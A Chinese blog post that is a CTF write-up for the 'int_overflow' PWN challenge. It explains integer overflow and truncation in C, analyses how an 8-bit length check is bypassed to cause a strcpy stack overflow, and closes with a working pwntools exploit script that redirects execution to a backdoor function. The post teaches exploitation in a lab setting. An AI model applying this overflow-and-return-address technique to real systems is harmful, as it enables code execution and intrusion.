CTF PWN-攻防世界Overflow整数溢出漏洞

最新推荐文章于 2025-01-23 15:13:25 发布
最新推荐文章于 2025-01-23 15:13:25 发布
阅读量2.2k 收藏 14
点赞数 3
分类专栏: CTF纪录 文章标签: 整数溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39190897/article/details/131987635
版权
本文介绍了整数溢出的概念,包括有符号和无符号整数的溢出、回绕以及截断情况,并通过C语言示例展示了漏洞。文章以攻防世界PWN题目int_overflow为例,分析了如何利用整数溢出来绕过长度检查,导致栈溢出,进而实现代码执行。最后,提出了EXP程序构造思路,强调了安全审计的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言

滴水穿石,非一日之功。继续练习攻防世界 PWN 题目,此次练习的题目是 int_overflow,顾名思义是整数溢出类型的漏洞:
在这里插入图片描述

整数溢出

做题不是目的,目的是为了学习不懂的知识。So 先来看看什么整数溢出漏洞吧。

C 语言中整数的分类及各自的大小范围如下所示:
在这里插入图片描述
正是因为这些类型的大小范围的限制才导致可能发生整数溢出。

整数溢出的异常有3种:

分类描述
溢出只有有符号数才会发生溢出;溢出标志OF可检测有符号数的溢出
回绕环绕特指的是无符号数,比如0减1时会变成最大的数,1字节的话会变为255,而255+1时会变为0;进位标志CF可检测无符号数的回绕
截断就是将一个较大宽度的数放入一个宽度较小的数中,高位将发生截断

有符号整数溢出

有符号整数溢出被分为上溢出和下溢出两种。

#include <stdio.h>
int main()
{
   //上溢出  
   int i = 2147483647;//int的最大值
   i++;
   printf("%d\n",i); //输出为最小负数

   //下溢出
   int j = -2147483648;//int的最小值
   j--;
   printf("%d\n",j);//输出为最大正数
   return 0;
}

运算结果如下:
在这里插入图片描述
【漏洞示例】

char buf[80];
void vulnerable() {
    int len = read_int_from_network();
    char *p = read_string_from_network();
    if (len > 80) {
        error("length too large: bad dog, no cookie for you!");
        return;
    }
    memcpy(buf, p, len);
}

此案例中,如果给 len 赋值一个负数,就可以绕过 if 判断,但是到 memcpy 时,因为第三个参数是 size_t(unsigned int) 类型,负数的 len 会被认为是一个很大的正数,从而复制大量内容到 buf,导致缓存区溢出。

无符号整数回绕

无符号数的计算不会溢出,但是会发生回绕。

#include <stdio.h>

int main()
{
   unsigned int i = 4294967295;
   i++;
   printf("%d\n",i); //输出为0
   return 0;
}

【漏洞示例】

void vulnerable() {
    size_t len;
    char* buf;
    len = read_int_from_network();
    buf = malloc(len + 5);
    read(fd, buf, len);
    ...
}

相较于上一个漏洞例子,这个例子避开来缓冲区溢出的问题,但是如果 len 很大时,len+5 会回绕,比如若是 len = 0xFFFFFFFF,len + 5 = 0x00000004,这时只 malloc 了4个字节,然而之后会 read 大量数据,缓冲区溢出也会发生。

截断与宽度溢出

1、加法截断

0xffffffff + 0x00000001
= 0x0000000100000000 (long long)
= 0x00000000 (long)

【漏洞示例】

void main(int argc, char *argv[]) {
    unsigned short int total;
    total = strlen(argv[1]) + strlen(argv[2]) + 1;
    char *buf = (char *)malloc(total);
    strcpy(buf, argv[1]);
    strcat(buf, argv[2]);
    ...
}

这个例子计算了输入参数的长度为 total,程序分配了内存来存拼接后的字符串。这里 total 的类型为 unsigned short int,如果攻击者提供的两个字符串总长度无法用 total 表示,则会发生截断,从而导致后面的缓冲区溢出。

2、乘法截断

0x00123456 * 0x00654321
= 0x000007336BF94116 (long long)
= 0x6BF94116 (long)

3、宽度溢出与整数提升

#include<stdio.h>
void main() {
    int l;  
    short s;
    char c;
    l = 0xabcddcba;
    s = l;
    c = l;
    printf("宽度溢出\n");
    printf("l = 0x%x (%d bits)\n", l, sizeof(l) * 8);
    printf("s = 0x%x (%d bits)\n", s, sizeof(s) * 8);
    printf("c = 0x%x (%d bits)\n", c, sizeof(c) * 8);
    printf("整型提升\n");
    printf("s + c = 0x%x (%d bits)\n", s+c, sizeof(s+c) * 8);
}

OUT:    
$ ./test
宽度溢出
l = 0xabcddcba (32 bits)
s = 0xffffdcba (16 bits)
c = 0xffffffba (8 bits)
整型提升
s + c = 0xffffdc74 (32 bits)

综上可以看出,在整数转换的过程中,有可能导致下面的错误:

  1. 损失值:转换为值的大小不能表示的一种类型;
  2. 损失符号:从有符号类型转换为无符号类型,导致损失符号。

int_overflow

接下来开始练习攻防世界的整数溢出题目:int_overflow。下载并查看附件,是个 32 位小端程序:
在这里插入图片描述
开启了 NX 保护,但是未开启 PIE 程序内存加载基地址随机化保护机制(即静态反汇编的地址可以直接使用)。

运行 elf 文件,程序要求用户依次输入用户名和密码,然后结束运行:
在这里插入图片描述

题目漏洞分析

将 elf 拖进 IDA Pro 中进行分析,F5 查看主函数伪代码如下:
在这里插入图片描述
逻辑很简单,用户输入整数 1 则进入 login(),跟进查看 login 函数:
在这里插入图片描述
两处 read 函数依次获取用户名、密码很正常,均不存在溢出,但是密码 buf 传递给了 check_passwd 函数,那就继续跟进:
在这里插入图片描述
分析下上述函数逻辑:

  1. 第 5 行代码定义了一个无符号 8 位整数变量 unsigned _int8 v3(取值范围 0-255);
  2. 第 7 行代码 v3 = strlen(s),取 check_passwd 函数中用户传递进来的密码字符串的长度作为 v3 的值。但是这里一定要注意的是: strlen 函数的返回值是 size_t 类型,在 32 位文件中即 unsigned int 类型,也就是无符号 32 位整型
  3. 第 8 行代码又限制 v3 变量的值(即输入的密码字符串的长度)需要大于整数 3 且小于整数 8;

以上过程存在漏洞的地方就在于:第 7 行代码 v3 = strlen(s) 是将 32 位的数据赋值给 8 位的变量,所以当 password 的长度 strlen(s) 超过 255 个字符时,将发生整数溢出漏洞,编译器将会自动进行截断,只留下后 8 位。此时只要满足 255+3 < strlen(s) <= 255+8,也就是 s 的长度在 (258,263] 这个范围内就可以满足判断条件。

进一步检查 dest 的栈结构:
在这里插入图片描述
在这里插入图片描述
程序为 check_password() 函数中的 dest 变量分配了 0x14 字节的储存空间,由于 strcpy(dest, s) 的 s 参数来源于 login() 函数第二个 read 函数,回溯发现其却可以读取 0x199 字节数据:
在这里插入图片描述
所以在利用整数溢出漏洞绕过 if 判断后,check_password() 函数中的 strcpy(dest, s) 处便显而易见地发生栈溢出

因此我们可以在 check_password 函数中通过整数溢出绕过 if 条件判断对输入字符串长度的限制,然后通过 strcpy 函数将输入字符串 s 先复制给 dest,同时在拷贝过程借助栈溢出漏洞将后门函数的地址赋值给 result,接着将 result 作为返回值返回给上层函数,也就是 check_passwd(),最后该返回值再作为 login() 函数的返回值返回给主程序,主程序便可以 getshell!

接下来寻找程序中是否存在后门函数,发现确实存在后门函数what_is_this:
在这里插入图片描述
偏移地址为 0x804868B,因为此程序未开启 PIE 内存加载基地址随机化保护机制,所以静态反汇编的地址可以直接使用:
在这里插入图片描述

EXP程序构造

综上所述,exp 利用程序的思路如下:

  1. 输入 password 字符串,位数大小在 (258,263] 这个范围内,利用整数溢出漏洞,绕过对字符串长度的判断;
  2. 利用 strcpy(dest, s) 函数处的栈溢出漏洞,将后门函数 what_is_this() 的地址填入缓冲区中并作为返回地址返回给主程序。

更细致点说就是:

  • 首先利用栈溢出,填充 dest 的 0x14 字节内存;
  • 然后再发送 4 字节内容覆盖栈底指针 ebp;
  • 接着用 system 函数的地址覆盖返回值;
  • 最后利用整数溢出漏洞,将字符串长度补充至 (258,263] 位,以此绕过对字符串长度的判断。

最终整体的栈结构将构造如下:
在这里插入图片描述
EXP 程序:

from pwn import *

io = remote("161.147.171.105", 61383)
cat_flag_addr = 0x0804868B
io.recvuntil("choice:")
io.sendline("1")
io.recvuntil("username:")
io.sendline("name")
io.recvuntil("passwd:")
payload = b'A'*(0x14 + 0x4) + p32(cat_flag_addr) + b'A'*(256-0x14-4-4+3)
io.sendline(payload)
io.interactive()

成功获取 Flag:cyberpeace{dee51b69c2224dbf4814ac4f6f941d20}
在这里插入图片描述
在这里插入图片描述

总结

本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出,一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。

本文参考文章:

  1. 整数溢出-From Ghostasky;
  2. 【攻防世界pwn-int_overflow】;
  3. 攻防世界 pwn 新手练习区 int_overflow;
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1897
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
从一道CTF题看整数溢出
csd_ct的专栏
06-07 1769
整数溢出漏洞是程序开发过程中危害较大的一种漏洞,经常是PWN中各大神的突破点,利用此跳板,攻入系统,进而攻陷真个系统。此类漏洞不容易发觉,也不容易引起编程人员的注意。 近期在研究“网鼎杯2020白虎组”的比赛试题中,有一道RE逆向题目-“恶龙”,涉及到整数溢出,如利用此漏洞,可快速拿到Flag。本题解题思路有多种,详见 https://blog.csdn.net/Palmer9/article/details/106117208/,这篇博客中有详细的解释。网上大多数的解法是,动...
CTF PWN新手入门篇,PWN学习总结
最新发布
Python84310366的博客
01-23 1192
一什么是栈溢出?栈溢出就是缓冲区溢出的一种。由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写入的地方,比如说返回地址。
php整数溢出 ctf,PWN INTEGER OVERFLOW 整数溢出
weixin_39932458的博客
03-26 549
0x00 PreviewLast few passage I didn't conclude some important points and a general direction of the learning route of PWN. I browser some passages and finally I found one maybe suitable and reaso...
buuctf pwn (第三波)学会利用整数溢出
月阴荒的博客
04-04 818
bjdctf_2020_babystack2 https://www.cnblogs.com/bhxdn/p/12331035.html
整数溢出漏洞
fa1c4的blog
02-01 1369
整数溢出 溢出 有符号数才会溢出, 通常分为上溢和下溢, OF可以检测溢出 回绕 无符号数0-1会从最小数变成最大数, 反之同理, CF可以检测回绕 截断 较大宽度的数存入小宽度的操作数里, 高位会截断 漏洞多发函数 size_t 类型: 0-255(单字节无符号整数) memcpy() strlen() strncpy() malloc() 漏洞利用 (1) 整数转换 攻击者给len赋值一个负数, 可以绕过if检测, memcpy()第三个参数是size_t, 负数会自动转成正数导致栈溢出 (2)
攻防世界pwn-int_overflow
a_silly_coder的博客
05-14 356
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
CTF比赛 二进制 PWN方向入门:基础知识点精讲
qq_62564422的博客
02-05 2221
称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态。这些参数仍会保存在调用函数(caller)的函数状态内,之后压入栈内的数据都会作为被调用函数(callee)的函数状态来保存。再将当前的ebp 寄存器的值(也就是调用函数的基地址)压入栈内,并将 ebp 寄存器的值更新为当前栈顶的地址。p2 1:59:00 开始。
Pwn技术到二进制漏洞分析
随着信息安全领域的发展,Pwn技术已经不再局限于网络安全领域,而成为了计算机安全领域中重要的一部分,涉及到软件漏洞利用、系统攻防技术等多个领域。 从最初的简单缓冲区溢出到后来的ROP、Return-to-libc等技术的...
学习PWN一个月后能做什么?
Moyun_vackbot的博客
03-16 2126
本文为笔者初学pwn的知识梳理,如有错误之处,敬请斧正。 栈溢出漏洞 原理 栈是一种后进先出的数据结构。在调用函数的时候,都会伴随着函数栈帧的开辟和还原(也称平栈)。栈结构示意图如下(以32位程序为例): 如图所示,栈空间是从高地址向低地址增长的。但是,若函数中用到了数组作为局部变量时,向数组的赋值时的增长方向是从低地址到高地址的,与栈的增长方向相反。若对未限制数组的赋值边界,则可能对数组进行恶意的越界写入,便会把栈中的数据覆盖,造成栈溢出漏洞。常用的造成栈溢出漏洞的函数有:scanf,gets
攻防世界 pwn
清霂的博客
02-02 721
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
【业务逻辑漏洞整数溢出
wj33333的博客
11-27 1122
整数溢出是一种常见的编程错误,它发生在将一个数值转换成超过其最大值或最小值所能表示范围内的另一个数值时。这可能会导致程序崩溃或产生不正确的结果。在业务逻辑漏洞中,整数溢出也是一个常见的问题。例如,如果一个程序需要处理大量的数据,而没有正确地处理整数溢出的情况,则可能会引发安全问题。例如,攻击者可能会利用整数溢出来绕过访问控制、操纵数据或改变程序的行为。2147483647是一个典型的整数溢出的例子。这是一个32位整数的极限值,因为它超过了该类型的最高有效值(0x7FFFFFFF),因此会产生溢出
整数溢出漏洞和格式化字符串漏洞
AlexYoung28的博客
10-29 6946
漏洞成因: 在计算机中,整数类型分为无符号整数和有符号整数 两种。 有符号整数会在最高位用0表示正数,1表示负 数,而无符号整数则没有这种规则。 常见的整数类型有8位(单字节字符类型、布尔类型)、 16位(短整型)、32位(长整型)等。 当一个整数存入了比它本身小的存储空间中,超出了 数据类型所能表示的范围时,就会发生整数溢出。 1. 基础知识 整数数据类型 数据类型 : ...
攻防世界pwn——pwn1
qq_62076255的博客
12-21 591
做题记录
Java常见漏洞——整数溢出漏洞、硬编码密码漏洞、不安全的随机数生成器
m0_61506558的博客
11-30 2160
(一)整数溢出漏洞(一)整数溢出漏洞计算机程序中的整数都是有范围的,不同的数据类型范围也不同,这是由编译器决定的,超过这个范围就有可能会出现整数溢出的情况。比如说Java 的int是32位有符号整数类型,其最大值是,最小值是0x80000000,即int表示的数的范围是在-~之间。当int类型的运算结果超出了这个范围时则发生了溢出,而且不会有任何异常抛出。整数溢出一般可以分为上界溢出和下界溢出两种。0x01 整数溢出漏洞介绍1.1上界溢出
安全漏洞--整数溢出漏洞(IOV)分析
热门推荐
关注互联网安全的小虾米一枚
04-19 1万+
漏洞简介         整数溢出漏洞(integer overflow):在计算机中,整数分为无符号整数以及有符号整数两种。其中有符号整数会在最高位用0表示正数,用1表示负数,而无符号整数则没有这种限制。另外,我们常见的整数类型有8位(单字节字符、布尔类型)、16位(短整型)、32位(长整型)等。关于整数溢出,其实它与其它类型的溢出一样,都是将数据放入了比它本身小的存储空间中,从而出现了溢出。由此引发的一切程序漏洞
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3475
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
【软件与系统安全】整数溢出、格式化字符串、数组越界访问漏洞
kkzzjx
05-20 1644
文章目录一、整数溢出整数表示举例防护二、格式化字符串漏洞三、数组越界访问漏洞产生举例 一、整数溢出 整数表示 原码、反码、补码表示: 对于正数原码、反码以及补码是其本身。负数的原码是其本身,反码是对原码除符号位之外的各位取反,补码则是反码加1。 CF是无符号溢出标志,OF是有符号溢出标志。即使有符号数相加/相减导致了CF=1也没什么意义,不能说明结果的正确与否。此时,OF=1,则说明结果溢出,出现错误;OF=0,说明结果正确。这个过程根本和CF没关系,CF=1/0,都不会影响。 这说明指针类型不同,对
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tr0e

分享不易,望多鼓励~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值